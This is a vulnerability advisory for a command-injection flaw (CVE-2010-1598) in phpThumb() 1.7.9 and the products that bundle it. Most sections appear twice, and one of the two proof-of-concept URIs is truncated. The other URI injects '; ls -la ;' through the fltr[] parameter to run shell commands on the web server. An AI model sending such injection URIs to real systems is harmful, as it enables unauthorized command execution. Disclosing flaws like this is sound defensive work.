phpThumb() 'fltr[]' Parameter Command Injection Vulnerability
BID:39605
Info
phpThumb() 'fltr[]' Parameter Command Injection Vulnerability
| Bugtraq ID: | 39605 |
| Class: | Input Validation Error |
| CVE: |
CVE-2010-1598 |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 21 2010 12:00AM |
| Updated: | Feb 27 2014 04:52PM |
| Credit: | M4g |
| Vulnerable: |
phpThumb phpThumb() 1.7.9 Johannes Jarolim Yet Another Photoblog (YAPB) 1.9.26 FLEXIcontent FLEXIcontent 1.5.3c FLEXIcontent FLEXIcontent 1.5.3B |
| Not Vulnerable: |
Johannes Jarolim Yet Another Photoblog (YAPB) 1.10.3 FLEXIcontent FLEXIcontent 1.5.4 |
Discussion
phpThumb() 'fltr[]' Parameter Command Injection Vulnerability
phpThumb() is prone to a command-injection vulnerability
Attackers can exploit this issue to execute arbitrary commands in the context of the webserver.
Note that successful exploitation requires 'ImageMagick' to be installed.
phpThumb() 1.7.9 is affected; other versions may also be vulnerable.
phpThumb() is prone to a command-injection vulnerability
Attackers can exploit this issue to execute arbitrary commands in the context of the webserver.
Note that successful exploitation requires 'ImageMagick' to be installed.
phpThumb() 1.7.9 is affected; other versions may also be vulnerable.
Exploit / POC
phpThumb() 'fltr[]' Parameter Command Injection Vulnerability
Attackers can exploit this issue via a browser. Reports indicate that this issue is being exploited in the wild.
The following example URIs are available:
http://www.example.com/phpThumb_1.7.9/phpThumb.php?src=Z:/home/example.com/www/kartinka.jpg&fltr[]=blur|5 -quality 75 -interlace line "Z:/home/example.com/www/kartinka.jpg" jpeg:"Z:/home/example.com
http://www.example.com/phpThumb_1.7.9/phpThumb.php?src=/home/example.com/public_html/kartinka.jpg&fltr[]=blur|5 -quality 75 -interlace line "/home/example.com/public_html/kartinka.jpg" jpeg:"/home/example.com/public_html/kartinka.jpg" ; ls -la ;&phpThumbDebug=9
Attackers can exploit this issue via a browser. Reports indicate that this issue is being exploited in the wild.
The following example URIs are available:
http://www.example.com/phpThumb_1.7.9/phpThumb.php?src=Z:/home/example.com/www/kartinka.jpg&fltr[]=blur|5 -quality 75 -interlace line "Z:/home/example.com/www/kartinka.jpg" jpeg:"Z:/home/example.com
http://www.example.com/phpThumb_1.7.9/phpThumb.php?src=/home/example.com/public_html/kartinka.jpg&fltr[]=blur|5 -quality 75 -interlace line "/home/example.com/public_html/kartinka.jpg" jpeg:"/home/example.com/public_html/kartinka.jpg" ; ls -la ;&phpThumbDebug=9
Solution / Fix
phpThumb() 'fltr[]' Parameter Command Injection Vulnerability
Solution:
Updates are available. Please see the references for details.
Solution:
Updates are available. Please see the references for details.
References
phpThumb() 'fltr[]' Parameter Command Injection Vulnerability
References:
References:
- FLEXIcontent 1.5.4 is finally out! (FLEXIcontent)
- PHPTHUMB <= 1.7.9 ARBITRARY COMMAND EXECUTION EXPLOIT (M4g)
- phpThumb Homepage (phpThumb)
- Yet Another Photoblog Plugin Homepage (jaroat)